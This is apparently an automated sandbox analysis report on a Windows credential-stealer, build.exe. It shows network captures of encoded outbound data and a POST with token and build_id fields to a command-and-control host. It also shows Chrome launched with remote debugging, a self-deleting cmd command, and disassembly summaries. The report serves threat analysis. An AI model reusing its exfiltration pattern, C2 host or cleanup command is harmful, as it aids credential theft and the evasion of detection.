2025-01-11 22:00:36 UTC	16355	OUT	Data Raw: 31 36 78 62 4f 6d 50 66 6b 39 61 38 78 72 32 33 51 62 4c 56 4a 50 67 68 4e 62 78 71 72 33 6c 78 46 4b 4c 53 4d 38 4f 59 53 32 57 55 64 79 53 41 35 41 2b 6c 65 4a 56 76 57 69 6b 6f 74 4c 6f 65 5a 6c 39 53 55 35 56 56 4b 56 37 53 73 46 64 4a 34 61 2f 77 42 52 4d 50 38 41 61 2f 6f 4b 35 75 75 6a 38 4e 66 36 6d 62 2f 65 2f 77 41 4b 39 54 68 2f 2f 66 6c 36 4d 38 50 6a 6a 2f 6b 55 53 39 59 2f 6d 62 75 4b 57 69 69 76 30 41 2f 45 78 4b 4b 4d 55 59 6f 47 65 30 7a 51 70 4d 75 47 34 50 5a 68 31 46 5a 32 43 6b 6a 49 54 6e 61 53 4b 31 43 61 79 6e 50 2b 6b 79 2f 37 35 2f 6e 58 34 7a 57 53 33 50 32 43 42 59 51 31 35 5a 71 2f 2f 49 61 76 2f 77 44 72 34 6b 2f 39 43 4e 65 6f 78 6d 76 4c 74 58 2f 35 44 56 39 2f 31 38 53 66 2b 68 47 76 71 65 44 2f 41 4f 4e 55 39 46 2b 5a 38 Data Ascii: 16xbOmPfk9a8xr23QbLVJPghNbxqr3lxFKLSM8OYS2WUdySA5A+leJVvWikotLoeZl9SU5VVKV7SsFdJ4a/wBRMP8Aa/oK5uuj8Nf6mb/e/wAK9Th//fl6M8Pjj/kUS9Y/mbuKWiiv0A/ExKKMUYoGe0zQpMuG4PZh1FZ2CkjITnaSK1CaynP+ky/75/nX4zWS3P2CBYQ15Zq//Iav/wDr4k/9CNeoxmvLtX/5DV9/18Sf+hGvqeD/AONU9F+Z8
2025-01-11 22:00:36 UTC	16355	OUT	Data Raw: 30 2b 4b 46 72 34 71 75 47 75 56 55 5a 49 39 54 7a 7a 39 65 4f 39 65 58 36 54 70 6d 75 50 71 63 55 65 6c 43 56 4c 78 74 77 6a 61 47 63 52 74 30 4a 50 7a 5a 47 4f 41 61 32 34 50 42 66 6a 71 31 75 35 4c 75 33 74 37 6d 47 35 6b 7a 76 6d 6a 76 6b 56 32 79 63 6e 4a 44 35 4f 54 7a 58 35 2f 4b 6e 4f 6d 2b 57 63 57 6d 66 58 59 57 62 64 4e 38 6b 57 30 2b 71 2f 72 63 71 2f 44 6e 2f 6b 66 64 4d 2f 37 61 2f 38 41 6f 70 36 37 47 79 38 58 51 47 33 76 70 58 38 66 2f 61 45 68 67 44 6c 76 37 47 4b 65 54 6d 52 46 33 59 32 2f 4e 39 37 62 6a 2f 61 7a 32 72 50 38 46 65 43 76 45 4f 6c 2b 4c 72 50 55 4e 51 73 66 4b 67 69 38 77 75 35 6d 52 6a 6b 6f 77 48 41 59 6e 71 61 39 62 6f 67 6e 59 37 38 48 52 6c 37 4b 30 72 72 56 39 31 30 58 6d 6a 67 4c 6e 56 34 64 5a 2b 48 65 70 33 45 47 Data Ascii: 0+KFr4quGuVUZI9Tzz9eO9eX6TpmuPqcUelCVLxtwjaGcRt0JPzZGOAa24PBfjq1u5Lu3t7mG5kzvmjvkV2ycnJD5OTzX5/KnOm+WcWmfXYWbdN8kW0+q/rcq/Dn/kfdM/7a/8Aop67Gy8XQG3vpX8f/aEhgDlv7GKeTmRF3Y2/N97bj/az2rP8FeCvEOl+LrPUNQsfKgi8wu5mRjkowHAYnqa9bognY78HRl7K0rrV910XmjgLnV4dZ+Hep3EG
2025-01-11 22:00:36 UTC	16355	OUT	Data Raw: 68 6d 6b 4f 63 66 78 44 30 46 59 65 31 7a 42 79 62 73 39 66 77 32 2f 46 61 6e 53 36 47 56 63 69 6a 7a 4c 53 32 76 66 65 39 2f 58 2f 41 43 4e 74 4c 6c 42 34 65 69 31 4b 57 30 31 46 59 58 74 37 71 5a 39 51 34 2b 7a 51 74 45 38 69 49 6a 66 4a 79 57 4b 4b 4d 62 67 63 73 4d 44 74 54 46 31 4b 78 6d 6c 68 30 2b 4a 4c 78 62 2b 58 54 45 76 6f 35 57 64 47 69 64 7a 43 4a 53 6d 33 59 43 6f 49 79 41 64 78 35 78 78 57 52 62 43 34 69 73 37 52 76 37 4a 6e 47 70 57 64 76 63 32 38 4d 78 75 76 33 4a 57 5a 70 47 4a 61 50 5a 6b 6b 43 51 6a 37 34 48 41 4a 48 61 6e 76 48 4d 31 71 68 67 30 79 61 48 55 6c 30 39 4c 44 37 52 4a 63 68 34 31 56 59 68 45 58 56 4e 67 49 59 71 44 31 5a 67 4d 6e 6a 4f 43 4d 34 79 7a 43 33 58 2b 72 2f 77 44 41 4e 70 77 79 6d 2b 6e 4c 62 39 4e 50 2b 43 62 Data Ascii: hmkOcfxD0FYe1zBybs9fw2/FanS6GVcijzLS2vfe9/X/ACNtLlB4ei1KW01FYXt7qZ9Q4+zQtE8iIjfJyWKKMbgcsMDtTF1Kxmlh0+JLxb+XTEvo5WdGidzCJSm3YCoIyAdx5xxWRbC4is7Rv7JnGpWdvc28Mxuv3JWZpGJaPZkkCQj74HAJHanvHM1qhg0yaHUl09LD7RJch41VYhEXVNgIYqD1ZgMnjOCM4yzC3X+r/wDANpwym+nLb9NP+Cb
2025-01-11 22:00:36 UTC	16355	OUT	Data Raw: 6a 37 66 42 36 76 2b 56 46 6d 42 61 34 6f 7a 56 54 37 66 42 2f 74 2f 6c 52 2f 61 4d 47 65 72 2f 6c 54 73 78 32 4c 64 47 61 71 66 32 6a 62 2b 72 2f 41 4a 55 66 32 6a 42 2f 74 2f 6c 52 5a 68 59 74 53 6a 4e 6e 64 66 38 41 58 4c 2b 6f 72 50 30 30 34 6e 62 2f 41 48 61 66 4a 71 4d 52 74 35 55 54 64 6c 31 32 38 6a 33 42 71 74 5a 33 43 57 38 72 4d 2b 63 46 63 63 55 52 69 30 6d 4b 78 72 30 56 56 2f 74 43 33 78 31 66 38 71 54 2b 30 62 66 2b 38 33 35 55 57 59 37 46 76 4e 4c 6d 71 66 38 41 61 46 74 6e 37 7a 2f 6c 53 2f 32 6a 62 66 33 6d 2f 77 43 2b 61 4c 4d 4c 46 71 67 39 4b 71 66 32 6a 61 2f 33 6d 2f 37 35 6f 2f 74 4b 32 2f 76 4e 2f 77 42 38 30 57 59 37 46 75 69 71 6e 39 6f 32 33 39 35 2f 2b 2b 61 50 37 52 74 76 37 7a 2f 39 38 30 57 59 57 5a 62 7a 36 55 74 55 78 71 Data Ascii: j7fB6v+VFmBa4ozVT7fB/t/lR/aMGer/lTsx2LdGaqf2jb+r/AJUf2jB/t/lRZhYtSjNndf8AXL+orP004nb/AHafJqMRt5UTdl128j3BqtZ3CW8rM+cFccURi0mKxr0VV/tC3x1f8qT+0bf+835UWY7FvNLmqf8AaFtn7z/lS/2jbf3m/wC+aLMLFqg9Kqf2ja/3m/75o/tK2/vN/wB80WY7Fuiqn9o2395/++aP7Rtv7z/980WYWZbz6UtUxq
2025-01-11 22:00:36 UTC	16355	OUT	Data Raw: 6e 6d 59 50 4a 61 6d 4b 6f 71 74 47 56 6c 72 2b 42 6f 39 36 57 73 79 50 56 62 4f 35 30 6e 55 7a 59 78 62 6d 4f 72 58 62 57 44 37 43 48 65 4f 46 49 33 38 73 5a 35 77 55 61 51 67 48 2b 36 4f 35 71 7a 4a 66 51 6b 61 5a 41 74 76 43 30 30 45 75 6f 52 58 62 4d 6f 4a 65 56 4c 4d 53 37 54 2f 75 4d 32 33 36 72 6d 73 6e 6e 46 4a 51 35 72 4f 2f 62 35 66 30 6a 64 63 4f 59 68 31 4f 58 6d 56 74 64 66 54 6f 57 71 4b 79 4c 44 57 62 61 48 51 4c 71 62 55 56 52 59 35 4a 4c 53 45 58 4a 58 4c 57 35 6b 45 76 7a 6a 76 67 4d 71 35 41 36 6a 4e 4c 4a 64 33 65 6e 57 6b 4d 31 31 5a 52 6d 39 74 4e 4e 6d 6d 65 33 64 51 52 4a 4b 4c 77 77 68 6d 2f 76 4b 71 6e 64 33 42 41 48 61 72 71 5a 70 53 70 79 63 57 76 36 74 63 79 70 5a 44 58 71 77 55 31 4a 57 66 2b 64 6a 57 6f 72 4e 30 33 55 70 72 Data Ascii: nmYPJamKoqtGVlr+Bo96WsyPVbO50nUzYxbmOrXbWD7CHeOFI38sZ5wUaQgH+6O5qzJfQkaZAtvC00EuoRXbMoJeVLMS7T/uM236rmsnnFJQ5rO/b5f0jdcOYh1OXmVtdfToWqKyLDWbaHQLqbUVRY5JLSEXJXLW5kEvzjvgMq5A6jNLJd3enWkM11ZRm9tNNmme3dQRJKLwwhm/vKqnd3BAHarqZpSpycWv6tcypZDXqwU1JWf+djWorN03Upr
2025-01-11 22:00:36 UTC	16355	OUT	Data Raw: 76 53 48 4f 4f 6c 4b 65 76 57 6b 4a 70 44 45 2b 74 46 4c 31 70 4f 76 61 6d 4d 51 39 61 4f 6e 54 6a 36 55 76 30 70 4f 2f 77 44 68 51 4d 39 45 6f 6f 6f 72 4d 2b 52 43 69 74 48 52 74 4a 62 57 4c 75 53 33 57 55 52 6c 49 7a 4a 6b 72 6e 4f 43 42 6a 72 37 31 71 66 38 49 6b 51 78 56 72 77 67 6a 71 44 46 2f 77 44 58 72 7a 63 56 6d 32 44 77 6b 2f 5a 31 70 32 66 6f 33 2b 53 50 53 77 75 55 59 33 46 30 2f 61 55 59 58 58 71 6c 2b 62 4f 61 6f 72 71 42 34 50 7a 2f 41 4d 76 2f 41 50 35 42 2f 77 44 73 71 67 31 4c 77 78 2f 5a 2b 6e 53 33 66 32 7a 7a 50 4c 78 38 76 6c 59 7a 6b 67 64 63 2b 39 5a 55 73 39 79 2b 72 4e 55 34 56 4c 74 75 79 30 6c 75 2f 6b 61 31 63 68 7a 43 6c 42 31 4a 30 37 4a 4b 37 31 6a 73 76 6d 63 39 52 52 52 58 72 6e 6b 42 52 52 52 51 41 55 55 55 55 41 46 46 Data Ascii: vSHOOlKevWkJpDE+tFL1pOvamMQ9aOnTj6Uv0pO/wDhQM9EooorM+RCitHRtJbWLuS3WURlIzJkrnOCBjr71qf8IkQxVrwgjqDF/wDXrzcVm2Dwk/Z1p2fo3+SPSwuUY3F0/aUYXXql+bOaorqB4Pz/AMv/AP5B/wDsqg1Lwx/Z+nS3f2zzPLx8vlYzkgdc+9ZUs9y+rNU4VLtuy0lu/ka1chzClB1J07JK71jsvmc9RRRXrnkBRRRQAUUUUAFF
2025-01-11 22:00:36 UTC	15788	OUT	Data Raw: 4e 4c 6b 2b 57 75 41 7a 34 4f 42 6e 4f 4d 6e 74 6e 42 2f 4b 70 5a 34 35 62 57 43 4f 65 35 67 6e 68 68 6c 78 35 63 6b 73 54 4b 72 35 47 65 43 52 67 38 65 6c 50 2b 79 38 4d 6e 62 6d 66 33 72 2f 41 43 45 73 2b 78 7a 56 31 42 66 63 2f 77 44 4d 62 52 54 53 2b 48 32 46 4a 41 33 6d 6d 48 42 6a 62 50 6d 44 47 55 36 66 65 35 48 48 58 6d 6c 6b 4a 68 56 57 6c 53 53 4e 57 4c 42 54 49 68 58 4a 55 34 59 44 49 35 77 65 44 36 56 36 69 71 51 65 7a 50 42 64 47 6f 6c 64 78 66 33 43 30 55 48 49 6b 65 4e 6c 5a 58 51 37 57 56 6c 49 4b 6e 30 49 4e 41 79 57 56 56 42 5a 6d 59 4b 71 71 4d 6b 6b 39 41 42 33 4e 56 64 57 75 51 34 74 4f 31 74 51 72 70 76 43 6e 69 43 7a 30 4e 4c 73 58 53 54 4e 35 78 51 72 35 53 67 39 4d 35 7a 6b 6a 31 72 6c 6d 6b 56 50 4e 33 42 68 35 49 4a 6c 47 30 35 Data Ascii: NLk+WuAz4OBnOMntnB/KpZ45bWCOe5gnhhlx5cksTKr5GeCRg8elP+y8Mnbmf3r/ACEs+xzV1Bfc/wDMbRTS+H2FJA3mmHBjbPmDGU6fe5HHXmlkJhVWlSSNWLBTIhXJU4YDI5weD6V6iqQezPBdGoldxf3C0UHIkeNlZXQ7WVlIKn0INAyWVVBZmYKqqMkk9AB3NVdWuQ4tO1tQrpvCniCz0NLsXSTN5xQr5Sg9M5zkj1rlmkVPN3Bh5IJlG05
2025-01-11 22:00:38 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 22:00:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-11 22:00:38 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49783	116.203.166.124	443	7144	C:\Users\user\Desktop\build.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 22:00:38 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----yusjeu3ozct0rq16p8ym User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0 Host: marka4.cyou Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2025-01-11 22:00:38 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 79 75 73 6a 65 75 33 6f 7a 63 74 30 72 71 31 36 70 38 79 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 62 39 64 33 64 30 62 34 64 36 34 65 64 66 38 32 65 36 39 63 64 63 31 35 38 62 34 36 31 64 65 0d 0a 2d 2d 2d 2d 2d 2d 79 75 73 6a 65 75 33 6f 7a 63 74 30 72 71 31 36 70 38 79 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 64 39 63 30 33 64 66 63 63 31 37 65 33 63 31 62 65 39 61 63 61 62 34 31 30 30 61 36 39 35 30 0d 0a 2d 2d 2d 2d 2d 2d 79 75 73 6a 65 75 33 6f 7a 63 74 30 72 71 31 36 70 38 79 6d 0d 0a 43 6f 6e 74 Data Ascii: ------yusjeu3ozct0rq16p8ymContent-Disposition: form-data; name="token"7b9d3d0b4d64edf82e69cdc158b461de------yusjeu3ozct0rq16p8ymContent-Disposition: form-data; name="build_id"7d9c03dfcc17e3c1be9acab4100a6950------yusjeu3ozct0rq16p8ymCont
2025-01-11 22:00:39 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 11 Jan 2025 22:00:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2025-01-11 22:00:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	16:59:57
Start date:	11/01/2025
Path:	C:\Users\user\Desktop\build.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\build.exe"
Imagebase:	0x400000
File size:	369'152 bytes
MD5 hash:	8B54AE3EDF9E8B611C27E4FDC3B2F4BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2067111556.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	17:00:07
Start date:	11/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	17:00:08
Start date:	11/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2952 --field-trial-handle=2008,i,2470610022824458282,7780640489389932804,262144 /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	17:00:38
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\build.exe" & rd /s /q "C:\ProgramData\2dba1" & exit
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	17:00:38
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	17:00:38
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 10
Imagebase:	0xcf0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	14%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.7%
Total number of Nodes:	193
Total number of Limit Nodes:	1

Executed Functions

Function 0040CCEA Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 0040CDF7

Strings

lTD, xrefs: 0040CD37
$|X, xrefs: 0040CE12
j(E, xrefs: 0040CD6F
lTD, xrefs: 0040CDC6

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: FileFindFirst
String ID: $|X$j(E$lTD$lTD
API String ID: 1974802433-1638559554
Opcode ID: 93ba6a4fb0da29434ce8e6e354f19ad1ebedb407e9703d29a19c9622524f0e29
Instruction ID: f96707184f20121d0bda5babc62ec9bbf22f85a6a0252dbd6d8119ede72c3401
Opcode Fuzzy Hash: 93ba6a4fb0da29434ce8e6e354f19ad1ebedb407e9703d29a19c9622524f0e29
Instruction Fuzzy Hash: 97318DB67011109FDB14DBACDCC0BA973B5AFCA308F054878E019D3352DB38AE198B59

Function 00428248 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(?,?), ref: 004282AF
memset.MSVCRT ref: 004282C3
memset.MSVCRT ref: 004282D4

Strings

%s\*.*, xrefs: 0042827A, 00428280, 00428294

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: memset$FileFindFirst
String ID: %s\*.*
API String ID: 2180624105-1013718255
Opcode ID: ee3cd0bef39285e60ec048c7d744cdacfd10b79e9f049abb3da976af403e7ac3
Instruction ID: 0a6b2ea63025e97e5e598bf4e61c55c08c71b8a32124561313a11673bac0cd5d
Opcode Fuzzy Hash: ee3cd0bef39285e60ec048c7d744cdacfd10b79e9f049abb3da976af403e7ac3
Instruction Fuzzy Hash: 8611E776A002445BD710DB99DC85D9B3BACDB8A350F05017CF919D3342E6789F58CBA4

Function 0040B846 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMON

Download Yara Rule

APIs

CreateDesktopA.USER32 ref: 0040B86C

Strings

%s%s", xrefs: 0040B88E, 0040B894, 0040B8A9, 0040B8AE
OCALAPPDATA, xrefs: 0040B8EE, 0040B8F4, 0040B902, 0040B907

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: CreateDesktop
String ID: %s%s"$OCALAPPDATA
API String ID: 3054513912-3945843140
Opcode ID: 860e00e64f807195728f0608d2f0bd4457fba2b31b2b7ff1c9972e30e191eb60
Instruction ID: 3d2972af386316d9be50767083905085ccda19580b27f6f880edc31ac63f85e4
Opcode Fuzzy Hash: 860e00e64f807195728f0608d2f0bd4457fba2b31b2b7ff1c9972e30e191eb60
Instruction Fuzzy Hash: A8310876A502008BD714DF68DDC0BA937F4EF9A704F08816DE809D7312E674EA95CB59

Function 004018DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 94fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 004019DA

Strings

0%E, xrefs: 00401908
0%E, xrefs: 0040194B

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: FileFindFirst
String ID: 0%E$0%E
API String ID: 1974802433-386105745
Opcode ID: 3c1b4fee3c951a545f55fd42dc46924680b74bce36de95e4240348f77afb1a4e
Instruction ID: 384581a553c9b641a9d9dadc207eefd58bf68b9b5068ecbce6f45e1e004277aa
Opcode Fuzzy Hash: 3c1b4fee3c951a545f55fd42dc46924680b74bce36de95e4240348f77afb1a4e
Instruction Fuzzy Hash: D13120BAA001649FC704DF98DC91AAD73B9EFC5608B08446CB51AE3351EA74BF45CB58

Function 0040177C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 90fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 004019DA

Strings

\*.*, xrefs: 004017F1, 004017F7, 00401810
0%E, xrefs: 004017AA

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: FileFindFirst
String ID: 0%E$\*.*
API String ID: 1974802433-1912814562
Opcode ID: 45da029c2d2ac17479f9af7bbc5d6394cf2116e07b0005f993176921ea4e3c3e
Instruction ID: 22346f696f13e9549d8facf84d4ffd02b2e8a1bb9ee0c0cc419566cfbec9e226
Opcode Fuzzy Hash: 45da029c2d2ac17479f9af7bbc5d6394cf2116e07b0005f993176921ea4e3c3e
Instruction Fuzzy Hash: 0A3140BAA001659FC715DF98DCA1AED73B4FF86308B04447CA519E3251EA34BF49CB58

Function 00412AC9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 00412B77

Strings

j(E, xrefs: 00412B34
j(E, xrefs: 00412B18

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: FileFindFirst
String ID: j(E$j(E
API String ID: 1974802433-4173197725
Opcode ID: 219f719297c6cbb6f48a629ba439f8744997e797cd7ddcf31338611ae8ca9535
Instruction ID: 8bab2d8d4da6b135567d6663b7f8523f409fe4a46747f795839d2863d3a3a458
Opcode Fuzzy Hash: 219f719297c6cbb6f48a629ba439f8744997e797cd7ddcf31338611ae8ca9535
Instruction Fuzzy Hash: CA2192BAB002049FCB18DBACEC81EDD73B6EFC6305B184124A815D3351DA34AE15CB59

Function 0040E749 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 0040E7FD

Strings

j(E, xrefs: 0040E795

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067018523.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067043560.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_build.jbxd

Similarity

API ID: FileFindFirst
String ID: j(E
API String ID: 1974802433-3790244945
Opcode ID: ca8952b2d87523698d5ab2caeaa578ab4bbb1f7eb8d0a0ed884b13eb9ba42fca
Instruction ID: 6d01b9231f5bbaf653de1ab32846f44ac3f5364cab858fddac85960c65a6f770
Opcode Fuzzy Hash: ca8952b2d87523698d5ab2caeaa578ab4bbb1f7eb8d0a0ed884b13eb9ba42fca
Instruction Fuzzy Hash: 2521DB366002048FCB14DF9CCCC4FA937A5AB8A314F044538B429E7352DA34AA18CB5A

Function 0041008C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 00410141

Strings

\*.*, xrefs: 004100DB, 004100E1, 004100FA

Memory Dump Source

Source File: 00000000.00000002.2066895437.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2066847375.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066934647.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066993754.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
